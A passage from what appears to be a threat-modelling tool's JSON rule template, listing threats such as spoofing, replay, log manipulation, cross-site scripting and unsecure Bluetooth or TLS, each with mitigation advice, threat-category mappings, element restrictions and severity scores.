firmware","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c31746fb-c296-4eda-b7a5-8227640e9c80","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"43deca38-18ab-4c2b-98f0-52f0b1bfefac","ComparisonType":"==","Value":true}}]},"Severity":4},{"ID":"a3c2f053-c8d6-4626-ae54-79f87ae171c3","Name":"Hardware manipulation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b8b580e-f99a-4e0c-850d-241fccfd0079","DetailRestrictions":[]},"Severity":1},{"ID":"221071ed-1d87-43cc-8052-b615e6ebef04","Name":"Key disclosure","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2d7223ec-7361-4f2a-bfea-d6c437e9a4f4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"5fccd43c-b3f0-405a-bfcc-8d2bb73bdd9e","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"6b4eb6d6-a03f-4678-a033-924bd5526f13","Name":"Spoofing the sender process","Description":"The sender process may be spoofed by an attacker and this may lead to unauthorized access to the receiver process. Consider using a standard authentication mechanism to identify the source process.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c6bc382b-d155-41c4-a41b-959d8a223e54","Name":"Spoofing the receiver process","Description":"The receiver may be spoofed by an attacker and this may lead to information disclosure by the sender. Consider using a standard authentication mechanism to identify the destination process.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ab65566e-a317-4e67-b647-d79ac948a62b","Name":"Spoofing the external entity","Description":"The external entity may be spoofed by an attacker and this may lead to unauthorized access to the receiver process. Consider using a standard authentication mechanism to identify the external entity.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"87e896bb-eb2e-4481-801b-a11d31a4e5e3","Name":"Spoofing of source data store","Description":"The data store may be spoofed by an attacker and this may lead to incorrect data delivered to the receiver. Consider using a standard authentication mechanism to identify the source data store.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"38053480-8db1-4185-adcc-9ebb5b913bef","Name":"Spoofing of destination data store","Description":"The data store may be spoofed by an attacker and this may lead to data being written to the attacker\'s target instead of the data store. Consider using a standard authentication mechanism to identify the destination data store.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"4440ba48-7d42-44cd-b5de-f6664ccc6259","Name":"Replay attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"4e007b60-94e7-4df3-b3bd-109eb8627da2","ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"1fec597f-dfd0-4fcc-b348-828307b946ee","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"240eabff-0c74-40e7-9748-d4cc46f59403","Name":"Log manipulation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c7598413-4382-43e9-9904-fd9d877eb7a9","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":3,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"PhyElementRest":{"Property":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}}}]},"Severity":2},{"ID":"ef5ee1a2-c3b4-492d-b7be-d2285f10107c","Name":"Risks from logging","Description":"Log readers can come under attack via log files. Consider ways to canonicalize data in all logs. Implement a single reader for the logs, if possible, in order to reduce attack surface area. Be sure to understand and document log file elements which come from untrusted sources.","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}}]}},{"ID":"ad30b363-be03-41a8-a422-3ad63cb077b1","Name":"JSON Processing","Description":"If a dataflow contains JSON, JSON processing and hijacking threats may be exploited.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"b395ada9-bc1d-4df9-b9f3-a1b09ee2a5aa","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"758fa1ec-35f3-44a2-9f3d-0e5c21fc92c4","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"a727e065-ff95-47d5-8aac-625dfc7a453c","Name":"Cross Site Scripting","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b48781b2-24a2-481b-b7c1-3390dbeeb973","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59076fab-74e3-415a-93f5-fffd12e3d79c","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"47889e58-6875-4fe5-aa04-91ea9054a166","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"5afac92d-d86d-49bc-8fd8-84242a651767","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"596fe057-9387-4f5c-bd01-ef81613739f4","Name":"Lower trusted subject updates logs","Description":"If you have trust levels, is anyone other outside of the highest trust level allowed to log? Letting everyone write to your logs can lead to repudiation problems. Only allow trusted code to log.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"3517184d-2795-45e8-8dde-667eb7aa8051","Name":"Data logs from unknown source","Description":"If you have trust levels, is anyone other outside of the highest trust level allowed to log? Letting everyone write to your logs can lead to repudiation problems. Only allow trusted code to log.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"ee25afa7-0267-4f20-96bb-9912494a383e","Name":"Insufficient auditing","Description":"Does the log capture enough data to understand what happened in the past? Do your logs capture enough data to understand an incident after the fact? Is such capture lightweight enough to be left on all the time? Do you have enough data to deal with repudiation claims? Make sure you log sufficient and appropriate data to handle a repudiation claims. You might want to talk to an audit expert as well as a privacy expert about your choice of data.","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a74ba004-2165-4721-9b9b-2ce4b9df88c2","DetailRestrictions":[]}},{"ID":"df93be9d-b184-4ee1-a1d0-4966c03721fc","Name":"Potential data repudiation","Description":"The receiver claims that it did not receive data from a source outside the trust boundary. Consider using logging or auditing to record the source, time, and summary of the received data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":1},{"ID":"8cc8d956-c72b-478c-88ba-e3dd362825a1","Name":"External entity potentially denies receiving data","Description":"The receiver claims that it did not receive data from a process on the other side of the trust boundary. Consider using logging or auditing to record the source, time, and summary of the received data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":1},{"ID":"6e270c51-65fe-497d-baaa-e390617e27a6","Name":"Data store denies potentially writing data","Description":"The receiver claims that it did not write data received from an entity on the other side of the trust boundary. Consider using logging or auditing to record the source, time, and summary of the received data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"12c29b20-0467-40ab-9208-2c01d6142eab","Name":"Authorization bypass","Description":"Custom authentication schemes are susceptible to common weaknesses such as weak credential change management, credential equivalence, easily guessable credentials, null credentials, downgrade authentication or a weak credential change management system. Consider the impact and potential mitigations for your custom authentication scheme.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c8a14b27-b13f-4358-9f3f-691d01c97c77"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"e0b99432-98a6-4e32-86d7-ca5f58897cc2","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"eb92cc8a-bceb-48a5-b0fd-0894a1d91c5c","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"b0d91b9a-111b-464b-8011-3e02defafe1d","Name":"Data store inaccessible","Description":"An external agent prevents access to a data store on the other side of the trust boundary.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"c7787e71-5c70-462c-9558-ce20e7cfdfe8","ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"063b7019-22aa-4eb8-8e6f-9f81dbeb513b","Name":"Eavesdropping","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","61d04f2d-83b1-4152-9aba-4ad188eef06d","bcd08af5-29bf-4ed8-ab6c-e311e88f4c84","7bbfe5d3-8a91-4210-99ab-79f670715e61"],"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b"},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4b7a61d0-c430-48ea-8730-03a81542a5d8","DetailRestrictions":[]},"Severity":3},{"ID":"df2c1c56-e04e-4b33-aae2-e13c9305a370","Name":"Privacy-violating interaction","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","af3ee78e-9e83-4bd1-b9b5-13ec28765518"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4b7a61d0-c430-48ea-8730-03a81542a5d8","DetailRestrictions":[]},"Severity":3},{"ID":"14a5667b-7aa9-41ef-82d1-c2a4e8e454aa","Name":"Processing of sensitive data","Description":"Personal information such as talks, coughs, etc. is exposed and processed by an external system","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","d6eafa9e-6d9d-42aa-a734-0eb11f25607b","e6ba8518-0074-492c-95e5-ebe89fa601fe","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":0,"NodeTypes":[{"TypeIDs":["4b7a61d0-c430-48ea-8730-03a81542a5d8"]},{"TypeIDs":[]}],"NodeRestrictions":[]},"Severity":4},{"ID":"94f3da7c-2e51-4025-9521-d91bf790cdea","Name":"Exposure of sensitive data","Description":"The loudspeaker discloses sensitive information in the public","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","af3ee78e-9e83-4bd1-b9b5-13ec28765518","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["210ba217-67da-4bda-9063-3c95716eb5b9"]}],"NodeRestrictions":[]},"Severity":4},{"ID":"1cd3c1af-ff49-461f-9f55-fadb851a0893","Name":"Risk of explosion","Description":"The battery may explode","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["bc4b439c-6197-48d3-a308-7fd323d2ea5e","6b8c08cb-3f02-413a-96b4-179bb1f67997","17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"1dc32bac-147f-42a4-a13c-44e5b59f7b81","DetailRestrictions":[]},"Severity":3},{"ID":"ea2ba48d-b7f9-42c9-b9d9-f4a9816383b0","Name":"Unsecure mode","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4338e868-4e3c-4473-ba27-6148e8b1fc0f","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"7f6ca653-a703-480c-b5d8-d82243171994","Name":"Missing user authentication","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1e3a8fb8-4a34-44be-8168-996a7e0283f1","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"289c20cd-ea84-4375-8453-b045b94e1dc6","Name":"Weak cryptographic algorithms","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"3f4c724d-3d4d-4b6b-9252-ef43b4240d79","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"3a44327d-24d1-4c53-a3ea-7d891fb86f47","Name":"Missing certificate","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"34344cae-d072-4901-a7be-4084a2534b45","ComparisonType":"==","Value":false}}]}},{"ID":"ea738f65-e0e7-4dc1-93b9-8798c4c8eeaf","Name":"Unsecure protocols","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"31f89637-4b8a-41e9-acac-9d012767a424","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9ea829dc-59d5-437c-8d24-9908feac2941","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"6ffb7af3-466f-4cb7-965e-d60956b2ae7e","Name":"Unsecure SSL/TLS version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"aa99758d-30a6-4e0f-9d11-1d46c0f43d6c","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"b2c6473b-9498-4b23-a02f-13e3818496d0","Name":"Exposes server version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6faf97a0-6039-4b7b-ba7c-6b9ef003ede3","ComparisonType":"==","Value":true}}]},"Severity":1},{"ID":"ca66721c-381d-43a1-9129-7643f04065d3","Name":"Missing patches","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"defc6bcc-2bc9-457a-abab-666ec78d4f73","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ff998b64-8348-4f41-8350-22ad07c68448","Name":"Missing web application firewall","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6f65b93f-53ad-424f-a81b-4777ad48ec97","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a1ac559b-0ed9-4e5c-815d-80d6dc23308e","Name":"Unsecure Bluetooth version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"80419a47-0ac7-488f-b958-da045b67d91f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"132c57c4-fe66-4c94-95e3-98a67669a4a5","Name":"Unsecure Bluetooth mode","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"04d5f07e-2482-451b-9e24-94cb650da53b","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cf1429d9-c9e7-4dc4-a54c-42596f246692","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"c9be8d05-1ea5-4947-a786-33b505f2c5fd","Name":"Unsecure Bluetooth 